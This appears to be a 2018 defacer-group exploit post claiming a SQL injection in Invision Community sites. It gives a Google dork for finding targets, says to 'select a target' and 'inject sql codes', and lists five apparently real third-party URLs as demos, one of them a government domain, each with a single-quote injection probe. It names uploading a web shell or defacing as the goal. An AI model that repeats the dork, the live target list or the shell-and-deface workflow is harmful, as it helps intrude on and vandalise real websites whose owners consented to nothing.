facebook facebook twitter rss

Powered by Invision Community www.cymiz.com sql injection

Author: anonysec , Published: 04-11-2018
[+] title : Powered by Invision Community www.cymiz.com sql injection
|[+] dork : intext: Powered by Invision Community inurl:"php id="
|[+] vendor : www.cymiz.com
|[+] author : AnonySec
|[+] our web : www.anonysec.org
|[+] risk : high
|[+] Tasted on : Windows 10 , Kali Linux
|[+] Vulnerability Version : 5.4.2
|[+] CWEs : CWE-89
|[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+]


|||Description|||
With this exploit you can access the forums that use IPS script from Invision Community!!
At the end you can upload shell.php or deface.html ,.....



|[+] search the google dork ==> intext: Powered by Invision Community inurl:"php id="
|[+] select a target
|[+] inject sql codes



|[+] demo :
http://link.streng.ro/click.php?id=2728' (sql injection)
http://cymiz.com/forum/single.php?id=2113' (sql injection)
http://acheronian-clan.de/html/treffen/t5book/index.php?id=59' (sql injection)
http://proyectoscemer.morelos.gob.mx/anteproyectos_drupal.php?id=1457' (sql injection)
http://www.thaihomemaster.com/webboard-readtopic.php?id=151' (sql injection)



|[+] Discovered by ==> Moeein Seven | www.moeein.ir
|[+] tnx==> ReZa Cloner , RedNofozi , SheikhShahin , Milad Shadow and all bax from anonysec team....

Like us on Facebook :